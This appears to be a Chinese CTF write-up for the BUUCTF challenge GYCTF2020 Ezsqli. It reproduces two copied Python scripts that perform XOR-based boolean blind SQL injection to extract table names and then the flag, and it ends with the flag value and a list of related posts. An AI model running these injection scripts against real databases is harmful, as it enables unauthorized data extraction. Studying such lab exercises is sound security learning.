54,【4】BUUCTF WEB GYCTF2020Ezsqli

进入靶场

吓我一跳,但凡放个彭于晏我都不说啥了

提交个1看看

1 and 1=1

1'#

还尝试了很多,不过都被过滤了,头疼

看看别人的WP

竟然要写代码去跑!!!,不会啊,先用别人的代码吧,后续一定去学

第一个代码爆出表名

php 复制代码
from turtle import right
import requests
import time

url = "http://..........."
table_name = ""
i = 0

while True:
    i = i + 1
    letf = 32
    right = 127
    while letf < right:
        mid = (letf + right) // 2
        payload = f"0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),{i},1))>{mid})"
        data = {"id": payload}
        res = requests.post(url=url, data=data).text
        if "Nu1L" in res:
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        table_name += chr(letf)
        time.sleep(0.2)
        print(table_name)
    else:
        break

得到表名 giers233333333333333,f1ag_1s_h3r3_hhhhh

第二个代码通过表名爆出flag

php 复制代码
import requests
import time
 
 
url = "http://........."
flag = ""
i = 0
 
 
while True:
    i = i + 1
    letf = 32
    right = 127
    while letf < right:
        s = flag
        mid = (letf+right) // 2
        s = s + chr(mid)
        payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"
        data = {"id":payload}
        res = requests.post(url=url,data=data).text
        if "Nu1L" in res:
            letf = mid + 1
        else:
            right = mid
    if letf != 32:
        flag += chr(letf-1)
        print(flag)
        time.sleep(0.2)
    else:
        break

得到FLAG{E6AC8B59-EC60-4BC1-A3C9-C6B770B889CE}

即flag{e6ac8b59-ec60-4bc1-a3c9-c6b770b889ce}

笔记

学习python脚本怎么写

相关推荐
代码萌新知1 小时前
设计模式学习(五)装饰者模式、桥接模式、外观模式
java·学习·设计模式·桥接模式·装饰器模式·外观模式
驱动探索者3 小时前
find 命令使用介绍
java·linux·运维·服务器·前端·学习·microsoft
卷Java3 小时前
违规通知功能修改说明
java·数据库·微信小程序·uni-app
小雨凉如水4 小时前
k8s学习-pod的生命周期
java·学习·kubernetes
li星野4 小时前
打工人日报#20251005
笔记·程序人生·fpga开发·学习方法
charlie1145141914 小时前
理解C++20的革命特性——协程支持2:编写简单的协程调度器
c++·学习·算法·设计模式·c++20·协程·调度器
养生技术人4 小时前
Oracle OCP认证考试题目详解082系列第54题
数据库·sql·oracle·运维开发·database·开闭原则·ocp
文火冰糖的硅基工坊4 小时前
[人工智能-综述-21]:学习人工智能的路径
大数据·人工智能·学习·系统架构·制造
JJJJ_iii4 小时前
【深度学习01】快速上手 PyTorch:环境 + IDE+Dataset
pytorch·笔记·python·深度学习·学习·jupyter
挺6的还5 小时前
4.数据类型
mysql